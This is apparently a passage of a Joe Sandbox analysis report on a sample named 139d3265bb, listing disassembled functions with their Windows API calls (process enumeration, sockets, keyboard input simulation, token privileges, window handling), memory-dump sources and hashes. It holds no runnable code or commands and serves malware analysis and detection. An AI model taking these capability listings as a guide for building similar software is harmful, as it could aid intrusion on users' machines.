Instruction ID: ecae26ce0acef3140cd72bfcd16e28b070e03a00f02ba021a00bbf178c6940cf
Opcode Fuzzy Hash: e84291088a025ab63d40a52a5b8e9209de6de2ebd4ea2cb5e2f35c2e0a9023f9
Instruction Fuzzy Hash: FFC12D75A00216EFDB14DF98C898EAEBBB5FF48704F148598E506EB251D731ED41CBA0

Function 00DD342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00DD3459
CoUninitialize.OLE32 ref: 00DD3463
VariantInit.OLEAUT32(?), ref: 00DD346E
VariantClear.OLEAUT32(?), ref: 00DD371B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: f52ee1680eb1200f85bda720512de517682ee651f15c6dffde24f6cbbd8b6355
Instruction ID: c53bbe74741b12f39c5e40ebc831c8367ab9eb6ae8f743f6ee25bb12deb86941
Opcode Fuzzy Hash: f52ee1680eb1200f85bda720512de517682ee651f15c6dffde24f6cbbd8b6355
Instruction Fuzzy Hash: 99A1E6756047009FCB10DF28D585A2AB7E5EF88715F14885AFD8A9B362DB30ED05CBB2

Function 00DB0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB0608
CLSIDFromProgID.OLE32(?,?,00000000,00DECC40,000000FF,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB062D
_memcmp.LIBVCRUNTIME ref: 00DB064E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: bdacc627bd2c80cb08f2a9635b8b8419c42cfb729a9802d5ad2074242b7ca337
Instruction ID: 8b8ec4c68efc53ea624c569c4f35d2f1248decee570ee865975156408780bf20
Opcode Fuzzy Hash: bdacc627bd2c80cb08f2a9635b8b8419c42cfb729a9802d5ad2074242b7ca337
Instruction Fuzzy Hash: 8E810D75A00109EFCB04DF98C984EEEBBB9FF89315F244558E516EB250DB71AE06CB60

Function 00DDA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00DDA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00DDA6BA

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Process32NextW.KERNEL32(00000000,?), ref: 00DDA79C
CloseHandle.KERNEL32(00000000), ref: 00DDA7AB

Part of subcall function 00D6CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D93303,?), ref: 00D6CE8A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 6435ef5766c885cea5bf7ca68d89cae107011435ee5921d0bd8f696e2e9d8a82
Instruction ID: 2f83684c3042ebba2e0d6f140756ad3d6680c2e115f3c59a8ad958193b3c79ed
Opcode Fuzzy Hash: 6435ef5766c885cea5bf7ca68d89cae107011435ee5921d0bd8f696e2e9d8a82
Instruction Fuzzy Hash: 4E513E71508350AFD710EF24D886A6BBBE8FF89754F44891DF98597252EB30D908CBB2

Function 00D91391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D914C0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff90c8dc98d01e99d733b4b1d477421edc36e75a794ffd8390b993f368704246
Instruction ID: 2ac82759ac0d1a29c84e26124ec41f6bfe2b58e30fbb6bd4ece320224c29ccd7
Opcode Fuzzy Hash: ff90c8dc98d01e99d733b4b1d477421edc36e75a794ffd8390b993f368704246
Instruction Fuzzy Hash: BD413B39A00212ABDF317BFD9C45ABE3AF5EF49370F294225F419D6292F63488419772

Function 00DE6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DE62E2
ScreenToClient.USER32(?,?), ref: 00DE6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DE6382

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 6aff1c9dbd40aced2875db336e35629b5e97c4aa2eca8a28aa078f932a02c582
Instruction ID: 95018283d60788beae307a17646ff8a15a7bcdce2e7c56b0f841a8a7e22e8c8d
Opcode Fuzzy Hash: 6aff1c9dbd40aced2875db336e35629b5e97c4aa2eca8a28aa078f932a02c582
Instruction Fuzzy Hash: EB512F74900245EFDF10EF69D8819AE7BB6FFA53A0F188159F9159B2A0D730ED81CB60

Function 00DD1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00DD1AFD
WSAGetLastError.WSOCK32 ref: 00DD1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DD1B8A
WSAGetLastError.WSOCK32 ref: 00DD1B94

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 5c413fa98bd4c283f3619ba694e6bacabaea54f5c3c056292ced69a8d98b30e0
Instruction ID: 4743d37154b7a880daefe08b2217064f24b63855851c348b5504eb528040054f
Opcode Fuzzy Hash: 5c413fa98bd4c283f3619ba694e6bacabaea54f5c3c056292ced69a8d98b30e0
Instruction Fuzzy Hash: FD417338640200AFEB20AF24C886F2A77E5EB45718F548459F9559F3D2D772ED41CBB0

Function 00D8B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd21a7d3a1a6c9ea0425515edcb060683d9f2e270e24a26c5ddaf96862824dc
Instruction ID: 846379266b360966668dfb120279d8eeaeebe03b436b0d43956a2a660317e1dd
Opcode Fuzzy Hash: 7dd21a7d3a1a6c9ea0425515edcb060683d9f2e270e24a26c5ddaf96862824dc
Instruction Fuzzy Hash: 75411775A00704BFD724AF3CCC42B6ABBE9EB88724F10856BF546DB292D771990187B0

Function 00DC56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DC5783
GetLastError.KERNEL32(?,00000000), ref: 00DC57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DC57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DC57FA

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 38a4c82b762998355e4a8f42932502303bba6dd5af80d3aba73991ba6078ffba
Instruction ID: 2110f62ce8ea40ff2641befd8d3e1015045ef3e256df8d6872d0f50267560ce3
Opcode Fuzzy Hash: 38a4c82b762998355e4a8f42932502303bba6dd5af80d3aba73991ba6078ffba
Instruction Fuzzy Hash: FB411C35600611DFCF11EF15D444A5ABBE1EF89321B198488EC4A9B362DB30FD45CBB1

Function 00D8D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D76D71,00000000,00000000,00D782D9,?,00D782D9,?,00000001,00D76D71,8BE85006,00000001,00D782D9,00D782D9), ref: 00D8D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D8D9AB
__freea.LIBCMT ref: 00D8D9B4

Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 076749db1e9f6c1dc0e8c8b1b71879429081eb83a00b66297d76216c55ad78b2
Instruction ID: ec133f78264df2d13a1a23f63ced8135741806c4fe34ea8ad0ca625edd68d1e8
Opcode Fuzzy Hash: 076749db1e9f6c1dc0e8c8b1b71879429081eb83a00b66297d76216c55ad78b2
Instruction Fuzzy Hash: 7C31B272A0021AABDF25AF65DC41EAE7BA6EB40710F194168FC08D72D0E735CD55CBB0

Function 00DE52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00DE5352
GetWindowLongW.USER32(?,000000F0), ref: 00DE5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DE53A8

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 653a95356bfbf6bead5d2e1207e7d13f32a83da1572238ecb9fee639f73ccc06
Instruction ID: d7a5a5a7aefb65107c3c6bfd56040daad9266f7cbc9b750d3f67b09a28c831d5
Opcode Fuzzy Hash: 653a95356bfbf6bead5d2e1207e7d13f32a83da1572238ecb9fee639f73ccc06
Instruction Fuzzy Hash: 2C313534A55A88EFEB30BF16EC45BE83762AB043D4F5C0001FA40962E5C3B0AD809B71

Function 00DBAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00DBABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 00DBAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 00DBAC74
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00DBACC6

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3220ce8fe63942dd49319478ca2264790124429934fc8453bad917acbc071522
Instruction ID: a44bd98308a7f443a0050c29feeffda3be22c0f5b845c573b0cbb3b85c92a306
Opcode Fuzzy Hash: 3220ce8fe63942dd49319478ca2264790124429934fc8453bad917acbc071522
Instruction Fuzzy Hash: 25312634A00358EFEF35CB6C8C457FE7FA5AB89310F08421AE486962D1D374C98187B2

Function 00DE7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00DE769A
GetWindowRect.USER32(?,?), ref: 00DE7710
PtInRect.USER32(?,?,00DE8B89), ref: 00DE7720
MessageBeep.USER32(00000000), ref: 00DE778C

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: bc92e8d332405d960df668a7b9a7afdf72cf7e0dcd34d39a98275d93433ed376
Instruction ID: ecc4cd2ba1c36a82262fd58c9e5185a380c9d88dc8d075e0b7a3b081a90d3566
Opcode Fuzzy Hash: bc92e8d332405d960df668a7b9a7afdf72cf7e0dcd34d39a98275d93433ed376
Instruction Fuzzy Hash: 3E41AD34609294DFDB51FF5AC894EA977F4FB49304F1940A8E854DB261C330E986CFA0

Function 00DE16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00DE16EB

Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65

GetCaretPos.USER32(?), ref: 00DE16FF
ClientToScreen.USER32(00000000,?), ref: 00DE174C
GetForegroundWindow.USER32 ref: 00DE1752

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f216408ff0a20c87d7af46ee9817fc3169720145029908e098899dff5610f118
Instruction ID: 4369313cfad96c9b906bc6a11adc7255094ab42125da23db16e13de7273c681d
Opcode Fuzzy Hash: f216408ff0a20c87d7af46ee9817fc3169720145029908e098899dff5610f118
Instruction Fuzzy Hash: 43311075E10249AFDB04EFAAC881DAEB7F9EF48304B548069E815E7251D631DE45CBB0

Function 00DE8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

GetCursorPos.USER32(?), ref: 00DE9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DA7711,?,?,?,?,?), ref: 00DE9016
GetCursorPos.USER32(?), ref: 00DE905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DA7711,?,?,?), ref: 00DE9094

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: beda9b638c30d820cd45750b9b0adbaf9312c1644fc8b4fba5d5e849bb4d7cd5
Instruction ID: 2f2b8bcca9e2b678c698ed041fcb53e093137f115d21c1d249e1f8a4c7d11d30
Opcode Fuzzy Hash: beda9b638c30d820cd45750b9b0adbaf9312c1644fc8b4fba5d5e849bb4d7cd5
Instruction Fuzzy Hash: 7A21D331601158EFCB259F96CCA8EFABBB9EF89350F484055F5059B261C3319A91DB70

Function 00DBD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00DECB68), ref: 00DBD2FB
GetLastError.KERNEL32 ref: 00DBD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00DBD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DECB68), ref: 00DBD376

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 52b8048ce9520ab2bd34159d23c552161859bb702a11f4b9f135ce6758b78600
Instruction ID: 731078507ece5925930824064321b10c6a20c82ef0d55f575573ec90189ccd1b
Opcode Fuzzy Hash: 52b8048ce9520ab2bd34159d23c552161859bb702a11f4b9f135ce6758b78600
Instruction Fuzzy Hash: 6A218370505301DF8710EF68C8814AABBE5EE55364F544A1DF89AC73A2E731D94ACBB3

Function 00DB1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DB102A
Part of subcall function 00DB1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1036
Part of subcall function 00DB1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1045
Part of subcall function 00DB1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB104C
Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DB15BE
_memcmp.LIBVCRUNTIME ref: 00DB15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB1617
HeapFree.KERNEL32(00000000), ref: 00DB161E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: d51053e1e95a3902a398877284bcdb34803911b9ed4930a186fd8881d383a6a6
Instruction ID: fc2502f11c5b2c20e3a126c9e3e7c10aab7920cfe7e480038a73de4c7172304a
Opcode Fuzzy Hash: d51053e1e95a3902a398877284bcdb34803911b9ed4930a186fd8881d383a6a6
Instruction Fuzzy Hash: DB214876E00209EFDB10DFA8C955BEEB7F8EF44354F588459E446AB241E730AA05CBB0

Function 00DE2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00DE280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DE2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DE2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DE2840

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 013bbb1b434efcd40f881276b8847affde7abdb5db4cea998f74a344342c1f67
Instruction ID: d4a8635744877e3ef0bd7e6cf7281391b8699956ace7535dc730073a83bec92c
Opcode Fuzzy Hash: 013bbb1b434efcd40f881276b8847affde7abdb5db4cea998f74a344342c1f67
